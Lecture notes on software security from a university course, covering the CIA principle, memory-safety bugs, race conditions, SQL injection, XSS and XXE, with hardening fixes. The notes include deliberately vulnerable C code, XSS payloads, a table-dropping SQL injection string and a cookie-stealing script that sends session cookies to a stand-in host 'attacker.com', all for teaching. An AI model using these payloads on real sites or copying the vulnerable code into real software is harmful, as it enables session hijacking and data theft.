Software Security Lecture Notes - Systems and Software Verification Laboratory PDF
The University of Manchester
Lucas Cordeiro
Summary
These lecture notes cover fundamental concepts of software security, including audience, relationships to other courses, learning outcomes, and the syllabus. Key topics include software security fundamentals and critical software vulnerabilities.
Systems and Software Verification Laboratory
Software Security
used by Dr. Bilal Alqudah, AHU
Lucas Cordeiro
Department of Computer Science

Audience
This course unit introduces students to basic and advanced approaches to formally build verified trustworthy software systems:
– Reliability: deliver services as specified
– Availability: deliver services when requested
– Safety: operate without harmful states
– Resilience: transform, renew, and recover in timely response to events
– Security: remain protected against accidental or deliberate attacks

Relationship to Other Courses
Software Security involves people and practices to build software systems, ensuring confidentiality, integrity and availability.
Related course units: Cyber-Security, Cryptography, Automated Reasoning and Verification, Logic and Modelling, Agile and Test-Driven Development, Software Engineering Concepts in Practice, Systems Governance.

Cyber-Security Pathway
Cyber-Security, Software Security, Cryptography and Systems Governance: build programs that continue to function correctly under malicious attack (trustworthy software systems).

Intended Learning Outcomes
– Explain the computer security problem and why broken software lies at its heart
– Explain continuous risk management and how to put it into practice to ensure software security
– Introduce security properties into the software development lifecycle
– Use software V&V techniques to detect software vulnerabilities and mitigate against them
– Relate security V&V to risk analysis to address continued resilience when a cyber-attack takes place
– Develop case studies to think like an attacker and mitigate them using software V&V

Syllabus
Part I: Software Security Fundamentals
o Defining a Discipline
o A Risk Management Framework
o Vulnerability Assessment and Management
o Overview on Traffic, Vulnerability and Malware Analysis

Syllabus (cont.)
Part II: Software Security
o Architectural Risk Analysis
o Code Inspection for Finding Security Vulnerabilities and Exposures (ref: Mitre's CVE)
o Penetration Testing, Concolic Testing, Fuzzing, Automated Test Generation
o Model Checking, Abstract Interpretation, Symbolic Execution
o Risk-Based Security Testing and Verification
o Software Security Meets Security Operations

Syllabus (cont.)
Part III: Software Security Grows Up
o Withstanding adversarial tactics and techniques defined in Mitre's ATT&CK™ knowledge base
o An Enterprise Software Security Program

Textbooks
– McGraw, Gary: Software Security: Building Security In, Addison-Wesley, 2006
– Hoglund, Greg: Exploiting Software: How to Break Code, Addison-Wesley, 2004
– Ransome, James and Misra, Anmol: Core Software Security: Security at the Source, CRC Press, 2014
– Edmund M. Clarke Jr., Orna Grumberg, Daniel Kroening, Doron Peled, Helmut Veith: Model Checking, The MIT Press, 2018
– Mark Dowd, John McDonald, et al.: The Art of Software Security Assessment: Identifying and Preventing Software Vulnerabilities, Addison-Wesley, 2006
These slides are also based on the lecture notes of "Computer and Network Security" by Dan Boneh and John Mitchell.

Software Platform Security
https://www.cybok.org/media/downloads/cybok_version_1.0.pdf

SEI CERT C Coding Standard: Rules for Developing Safe, Reliable, and Secure Systems
Computer Emergency Response Team
https://resources.sei.cmu.edu/downloads/secure-coding/assets/sei-cert-c-coding-standard-2016-v01.pdf

The CERT Division
CERT's main goal is to improve the security and resilience of computer systems and networks
https://www.sei.cmu.edu/about/divisions/cert/

Intended Learning Outcomes
– Define standard notions of security and use them to evaluate the system's confidentiality, integrity and availability
– Explain standard software security problems in real-world applications
– Use testing and verification techniques to reason about the system's safety and security

Motivating Example
(The slide's program, reproduced as written; it is deliberately vulnerable.)

    #include <stdio.h>
    #include <stdlib.h>
    #include <string.h>

    int getPassword() {
        char buf;                      /* a single byte of stack storage */
        gets(buf);                     /* unbounded read into that byte */
        return strcmp(buf, "SMT");
    }

    void main() {
        int x = getPassword();
        if (x) {                       /* i.e. x != 0: the input was not "SMT" */
            printf("Access Denied\n");
            exit(0);
        }
        printf("Access Granted\n");
    }

What happens if the user enters "SMT"?
On a Linux x64 platform running GCC 4.8.2, an input consisting of 24 arbitrary characters followed by ], , and @ will bypass the "Access Denied" message. A more extended input will run over into other parts of the computer memory.
Barrett et al., Problem Solving for the 21st Century, 2014.

What is Safety and Security?
Safety
– If the user supplies any input, then the system generates the desired output
– Any input ⇒ Good output
– Safe and protected from danger/harm
– More features lead to a higher verification effort

Security
– If an attacker supplies unexpected input, then the system does not fail in specific ways
– Bad input ⇒ Bad output
– Protection of individuals, organizations, and properties against external threats
– More features lead to a higher chance of attacks

Overview
[Figure: System, User, Attacker]
Security consists of the following basic elements:
– Honest user (Alice)
– Dishonest attacker
– Goal: how the attacker
  o disrupts Alice's use of the system (Integrity, Availability)
  o learns information intended for Alice only (Confidentiality)
Boneh, D. and Mitchell, J., "Computer and Network Security", 2009.

Network Security
[Figure: Network Attacker between User and System]
Network attacker: intercepts and controls network communication
Boneh, D. and Mitchell, J., "Computer and Network Security", 2009.

Web Security
[Figure: Web Attacker, User, System]
Web attacker: sets up a malicious site visited by the victim; there exists no control of the network
Boneh, D. and Mitchell, J., "Computer and Network Security", 2009.

Operating System Security
[Figure: OS Attacker, User]
OS attacker: controls malicious files and applications
Boneh, D. and Mitchell, J., "Computer and Network Security", 2009.

CIA Principle
[Figure: System, User, Attacker]
– Confidentiality: Attacker does not learn the user's secrets.
– Integrity: Attacker does not undetectably corrupt the system's function for the user
– Availability: Attacker does not keep the system from being useful to the user
Boneh, D. and Mitchell, J., "Computer and Network Security", 2009.

What does it mean for software to be secure?
A software system is secure if it satisfies a specified security objective
§ E.g. confidentiality, integrity and availability requirements for the system's data and functionality

Example of Social Networking Service
– Confidentiality: Pictures posted by a user can only be seen by that user's friends
– Integrity: A user can like any given post at most once
– Availability: The service is operational more than 99.9% of the time on average

Security Failure and Vulnerabilities
A security failure is a scenario where the software system does not achieve its security objective
– A vulnerability is the underlying cause of such a failure
Most software systems do not have precise, explicit security objectives
– These objectives are not absolute
– They are traded off against other objectives, e.g. performance or usability
Software implementation bugs can lead to a substantial disruption in the behaviour of the software

Software Security
Software security consists of building programs that continue to function correctly under malicious attack

Software Requirements Definition
[Figure: layers Application, Firmware, OS, Services, Communication]
– Availability: services are accessible if requested by authorized users
– Integrity: data completeness and accuracy are preserved
– Confidentiality: only authorized users can get access to the data

Why are there security vulnerabilities?
Software is one of the sources of security problems
– Why do programmers write insecure code?
Awareness is the main issue. Some contributing factors:
– Limited number of courses in computer security
– Programming textbooks do not emphasize security
– Limited number of security audits
– Programmers are focused on implementing features
– Security is expensive and takes time
– Legacy software (e.g., C is an unsafe language)

Implementation Vulnerability
We use the term implementation vulnerability (or security bug) both for bugs that
– make it possible for an attacker to violate a security objective
– and for classes of bugs that enable specific attack techniques
The Common Vulnerabilities and Exposures (CVE) is a publicly available list of entries
– describes vulnerabilities in widely-used software components
– it lists close to a hundred thousand such vulnerabilities
https://www.cve.org/
https://cve.mitre.org/

Critical Software Vulnerabilities: Null pointer dereference
A NULL pointer dereference occurs when the application dereferences a pointer that it expects to be valid, but is NULL.

    int main() {
        double *p = NULL;      /* the slide also shows the variant p = new double() */
        int n = 8;
        for (int i = 0; i < n; ++i)
            *(p+i) = i*2;      /* writes through the NULL pointer */
        return 0;
    }

Scope / Impact:
– Availability: crash, exit and restart
– Integrity, Confidentiality, Availability: execute unauthorized code or commands

Critical Software Vulnerabilities: Double free
The product calls free() twice on the same memory address, leading to modification of unexpected memory locations.

    #include <stdlib.h>

    int main() {
        char *ptr = (char *)malloc(sizeof(char));
        if (ptr == NULL) return -1;
        *ptr = 'a';
        free(ptr);
        free(ptr);             /* second free of the same address */
        return 0;
    }

Scope / Impact:
– Integrity, Confidentiality, Availability: execute unauthorized code or commands

Using NULL in a condition:
    if (NULL)  { ... }   X
    if (true)  { ... }   OK
    if (false) { ... }   OK
    if (1)     { ... }   OK

Critical Software Vulnerabilities: Unchecked Return Value to NULL Pointer Dereference
The product does not check for an error after calling a function that can return with a NULL pointer if the function fails.

    String username = getUserName();
    if (username.equals(ADMIN_USER)) {
        ...
    }

Scope / Impact:
– Availability: crash, exit and restart

Critical Software Vulnerabilities (cont.)
– Division by zero:
    cin >> x;
    int w = R/x;
– Missing free:
    int *ptr;
    ...
    ptr = new int();      /* never released */
– Use after free:
    free(ptr);
    *ptr = 20;
– APIs rule based checking:
    class w {
    private:
        int *ptr;
    public:
        w() {};                  /* the constructor never allocates ptr */
        ~w() { delete(ptr); }    /* the destructor deletes it anyway */
    };

Race Condition Vulnerabilities
[Figure: several VDUs (Visual Display Units), each running a process P, all accessing one database]
Race conditions occur when multiple processes perform unsynchronized accesses to the database.

Race Condition Vulnerabilities (cont.)
Concurrency is an essential subject with importance well beyond the area of cyber-security
– Prove program correctness
Race condition vulnerabilities are relevant for many different types of software
– Race conditions on the file system: privileged programs. An attacker can invalidate the condition between the check and the action
– Races on the session state in web applications: web servers are often multi-threaded. Two HTTP requests belonging to the same HTTP session may access the session state concurrently (corruption of the session state)

Web Application Vulnerabilities
https://www.imperva.com/blog/the-state-of-web-application-vulnerabilities-in-2018/
[Figure: vulnerabilities by categories]

Structured output generation vulnerabilities
A SQL injection vulnerability is a structured output generation vulnerability where the structured output consists of SQL code
– These vulnerabilities are relevant for server-side web apps that interact with a back-end database by constructing queries based on input provided through web forms
A script injection vulnerability, or Cross-Site Scripting (XSS) vulnerability, is a structured output generation vulnerability
– the structured output is JavaScript code sent to a web browser for client-side execution
Sketch on the slide of a query built from the stNO parameter:

    Sub getstudent ( stNO ){
        select student from courses where 1=1; drop table student cascade ;-- > 2000 ;
    }

SQL Injection
https://www.hacksplaining.com/lessons
SQL injection allows an attacker to interfere with the queries to the database in order to retrieve data
- retrieving hidden data
- subverting application logic
- UNION attacks
- examining the database
- blind SQL injection
https://portswigger.net/web-security/sql-injection

Example of SQL Injection
A programmer can construct a SQL query to check name and password as

    query = "select * from users where name='" + name + "' and pw='" + password + "'"

However, if an attacker provides the name string, the attacker can set name to "John' --"
– this would remove the password check from the query (note that -- starts a comment in SQL)

Cross-site Scripting (XSS)
XSS attacks represent injection of malicious scripts into trusted websites...
[Form: Employee ID]
XSS allows attackers to bypass access controls
– If eid has a value that includes source code, then the code will be executed by the web browser
– use e-mail or social engineering tricks to lead victims to visit a link to another URL

XSS
XSS stands for Cross-Site Scripting, which is a type of web security vulnerability that allows attackers to inject malicious code into a web page viewed by other users. In an XSS attack, the attacker injects scripts or other code into a web page, which is then executed by the victim's web browser. This can allow the attacker to steal sensitive information, such as login credentials, session tokens, or other personal data.
XSS attacks can be classified into two main types: stored (also known as persistent) and reflected (also known as non-persistent). Stored XSS attacks involve injecting malicious code into a web page that is then stored on the server and served to all users who visit the page. Reflected XSS attacks involve injecting code that is then reflected back to the user, such as in a search field or other input form.
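The two structured-output cases from the slides, the name/password query with the "John' --" input and the escaping and allow-list fixes used in the XSS examples that follow, worked through in Python as an added example (not code from the lecture notes or the cited posts). It assumes a constructed SQLite table with one user; html.escape stands in for htmlspecialchars(..., ENT_QUOTES, 'UTF-8'), and the names slide_sanitize and search_results are mine.

```python
import html
import re
import sqlite3


def make_db():
    # Constructed in-memory users table with one row so the example runs offline.
    con = sqlite3.connect(":memory:")
    con.execute("create table users (name text, pw text)")
    con.execute("insert into users values ('John', 's3cret')")
    return con


def concat_query(name, password):
    # The slide's construction: user input is pasted into the SQL text.
    return ("select * from users where name='" + name +
            "' and pw='" + password + "'")


def login_concat(con, name, password):
    # Vulnerable: the name "John' --" closes the string and starts a comment,
    # so the "and pw=..." part is never evaluated.
    return con.execute(concat_query(name, password)).fetchone() is not None


def login_param(con, name, password):
    # Hardened: placeholders keep the input as data. The statement's structure
    # is fixed before the values are bound, so a quote or "--" in the input
    # can only be compared, never parsed.
    sql = "select * from users where name=? and pw=?"
    return con.execute(sql, (name, password)).fetchone() is not None


def slide_sanitize(text):
    # The greet() fix on the slide: only '<' and '>' are replaced.
    # Quotes pass through, which is fine for element text but not for
    # a value placed inside an attribute.
    return text.replace("<", "&lt;").replace(">", "&gt;")


def escape_html(text):
    # Equivalent of htmlspecialchars($v, ENT_QUOTES, 'UTF-8'): &, <, >, "
    # and ' are all encoded, so the value is inert as text and in attributes.
    return html.escape(text, quote=True)


def greeting(name):
    # "Hello, <name>!" with the name rendered as text, never as markup.
    return "Hello, " + escape_html(name) + "!"


SEARCH_TERM_RE = re.compile(r"[a-zA-Z0-9]+")


def search_results(term):
    # The allow-list from the DOM-based XSS slide: input outside
    # [a-zA-Z0-9]+ is refused outright rather than escaped.
    if SEARCH_TERM_RE.fullmatch(term):
        return "Search results for: " + term
    return "Invalid search term."
```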
ref: https://www.girlscanhack.com/post/breaking-down-the-web-5-real-life-xss-attacks-how-they-work-and-how-to-fix-them

XSS Example
Example of a web page with a Cross-Site Scripting (XSS) vulnerability in JavaScript. The code allows users to input their name, which is then displayed in a greeting message when they click the "Submit" button. However, the script does not properly sanitize user input, making it vulnerable to a cross-site scripting attack.
[Page: "Welcome to my website! Enter your name below:" with a name field and a Submit button]

    function greet() {
        var name = document.getElementById("name").value;
        document.getElementById("greeting").innerHTML = "Hello, " + name + "!";
    }

An attacker could inject malicious code into the name input field, such as:

    <script>alert('You have been hacked!')</script>

The Fix
To fix this vulnerability, the code should properly sanitize user input, such as by using:
A. a content security policy, or
B. validating input on the server side before displaying it in the HTML.

XSS Example (fixed)
We've added a Content Security Policy (CSP) meta tag in the `head` section of the page to only allow resources to be loaded from the same origin as the website, preventing any external scripts from being loaded. In addition, we've updated the `greet()` function to sanitize user input before displaying it in the greeting message. We've used the `replace()` method to replace any `<` and `>` characters in the user input with their HTML entity equivalents, `&lt;` and `&gt;`, respectively.
[Page: "Welcome to my website! Enter your name below:" with a name field and a Submit button]

    function greet() {
        var name = document.getElementById("name").value;
        // the replace() step described above; the slide shows only the assignment below
        name = name.replace(/</g, "&lt;").replace(/>/g, "&gt;");
        document.getElementById("greeting").innerHTML = "Hello, " + name + "!";
    }

XSS can be used by attackers to perform a wide range of malicious activities, including but not limited to:
1. Stealing sensitive information: An attacker can use XSS to steal sensitive data such as login credentials, session tokens, and other personal information that may be present on the web page.
2. Session hijacking: Attackers can use XSS to hijack the victim's session by stealing their session cookies or other session identifiers, which can then be used to impersonate the victim and gain unauthorized access to their account.
3. Delivering malware: Attackers can use XSS to deliver malware to the victim's computer, which can then be used to compromise the system, steal sensitive data, or launch further attacks.
4. Phishing: Attackers can use XSS to create convincing phishing pages that trick users into entering their login credentials or other sensitive information.
5. Defacing websites: Attackers can use XSS to modify the content of a web page, defacing it or inserting malicious links or code.
6. Creating self-propagating worms: In some cases, attackers can use XSS to create self-propagating worms that spread automatically to other users who visit the same web page.

Reflected XSS via URL parameter (PHP)

    http://example.com/search?q=<script>alert("XSS");</script>

In this example, the q parameter in the URL is vulnerable to a reflected XSS attack. The attacker injects a script that displays an alert box with the text "XSS" when the victim clicks on the link.
To fix this, you should validate and sanitize user input on the server side. In this case, you should escape any special characters that could be used to inject scripts into the HTML. You can use an HTML encoding library, like htmlspecialchars(), to do this.
    $q = htmlspecialchars($_GET['q'], ENT_QUOTES, 'UTF-8');

Stored XSS in comment section
(HTML) [Form: "Leave a comment:" with a text area and a Submit button]
In this example, the text area field is vulnerable to a stored XSS attack. An attacker could inject a script into the comment field, which would be stored on the server and executed in the victim's browser when they view the comment section.
The Fix: you should sanitize user input before storing it on the server side. You can use a library like htmlpurifier to remove any malicious scripts and tags from the user's input.
(PHP)

    require_once 'htmlpurifier-4.12.0/library/HTMLPurifier.auto.php';
    $config = HTMLPurifier_Config::createDefault();
    $purifier = new HTMLPurifier($config);   // instantiation, missing from the slide
    $comment = $purifier->purify($_POST['comment']);

DOM-based XSS via JavaScript
(HTML)

    var searchResults = document.getElementById("search-results");
    var searchTerm = window.location.search.replace("?q=", "");
    searchResults.innerHTML = "Search results for: " + searchTerm + "";

In this example, the searchTerm variable is vulnerable to a DOM-based XSS attack. If an attacker is able to inject a script into the q parameter in the URL, it will be executed when the JavaScript code modifies the content of the searchResults element.
To fix this, you should use proper input validation and sanitization techniques to prevent user input from being able to execute scripts. You can use regular expressions or input validation libraries to ensure that the input is safe.
(JavaScript)

    var searchTerm = window.location.search.replace("?q=", "");
    if (/^[a-zA-Z0-9]+$/.test(searchTerm)) {
        searchResults.innerHTML = "Search results for: " + searchTerm + "";
    } else {
        searchResults.innerHTML = "Invalid search term.";
    }

Stored XSS in form field
(HTML) [Form: Username, Password, Login button]
In this example, the username field is vulnerable to a stored XSS attack. An attacker could inject a script into the username field, which would be stored on the server and executed in the victim's browser when they log in.
To fix this, you should escape and sanitize user input before storing it on the server side. You can use an HTML encoding library, like htmlspecialchars(), to do this.
(PHP)

    $username = htmlspecialchars($_POST['username'], ENT_QUOTES, 'UTF-8');

Session hijacking via cookie stealing
(HTML)

    var cookie = document.cookie;
    var attackerURL = "http://attacker.com/steal.php?cookie=" + cookie;
    var img = new Image();
    img.src = attackerURL;

In this example, an attacker injects a script into a vulnerable website that steals the victim's session cookie. The script creates an image object with the URL of the attacker's server and the victim's session cookie as a parameter. When the victim's browser loads the image, the session cookie is sent to the attacker's server, allowing them to hijack the victim's session.
To fix this, you should use secure cookies and HTTPS to prevent session hijacking attacks. You can set the HttpOnly and Secure flags on cookies to prevent them from being accessed by scripts and to ensure that they are only transmitted over secure connections.
(PHP)

    session_set_cookie_params(0, '/', '', true, true);   // lifetime, path, domain, secure, httponly
    session_start();

Resources to Practice
https://pentest-tools.com/blog/xss-attacks-practical-scenarios
https://github.com/digininja/DVWA
Damn Vulnerable Web Application is damn vulnerable! Do not upload it to your hosting provider's public html folder or any Internet facing servers, as they will be compromised. It is recommended to use a virtual machine (such as VirtualBox or VMware), which is set to NAT networking mode. Inside a guest machine, you can download and install XAMPP for the web server and database. Download the website.
XSS Attack: 3 Real Life Attacks and Code Examples
https://brightsec.com/blog/xss-attack/
https://www.websentra.com/cross-site-scripting-attacks-guide-examples/
https://owasp.org/www-community/attacks/xss/

XML External Entity (XXE) Processing
XXE represents a malicious action against an application that parses XML input
– XXE occurs when XML input (incl. an external entity) is processed by a weakly configured XML parser
– XXE might lead to the disclosure of confidential data
Fragment of the slide's XML example, as it survived extraction:
    ]> &xxe; mypass
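An added example, not from the lecture notes, of the parser configuration the XXE slide calls for: a Python expat parser that refuses any DOCTYPE (the only place an entity can be declared) and never resolves parameter entities. Both XML documents are constructed for the example, and the SYSTEM identifier in the second is a placeholder.

```python
import xml.parsers.expat as expat


class DoctypeRejected(ValueError):
    """The document declares a DTD, which is where entities are defined."""


# Constructed samples. The second carries an external entity declaration of
# the kind the slide refers to; the system identifier is a placeholder.
SAFE_DOC = "<login><user>alice</user><pw>mypass</pw></login>"
XXE_DOC = ('<!DOCTYPE login [<!ENTITY xxe SYSTEM "file:///PLACEHOLDER-PATH">]>'
           '<login><user>alice</user><pw>&xxe;</pw></login>')


def parse_without_dtd(doc):
    # Returns (tag, text) pairs in end-tag order. A DOCTYPE aborts parsing
    # before any entity can be declared, and parameter entities are never
    # fetched, so no external resource is ever read on behalf of the input.
    parser = expat.ParserCreate()
    parser.SetParamEntityParsing(expat.XML_PARAM_ENTITY_PARSING_NEVER)
    out, stack = [], []

    def start_doctype(name, sysid, pubid, has_internal_subset):
        # Raising inside a handler stops the parser and propagates out of Parse().
        raise DoctypeRejected("DOCTYPE %r is not allowed" % name)

    def start(tag, attrs):
        stack.append([tag, ""])

    def chars(data):
        if stack:
            stack[-1][1] += data

    def end(tag):
        tag_name, text = stack.pop()
        out.append((tag_name, text))

    parser.StartDoctypeDeclHandler = start_doctype
    parser.StartElementHandler = start
    parser.CharacterDataHandler = chars
    parser.EndElementHandler = end
    parser.Parse(doc, True)
    return out


def rejects_dtd(doc):
    # True when the hardened parser refuses the document, False when it parses.
    try:
        parse_without_dtd(doc)
    except DoctypeRejected:
        return True
    return False
```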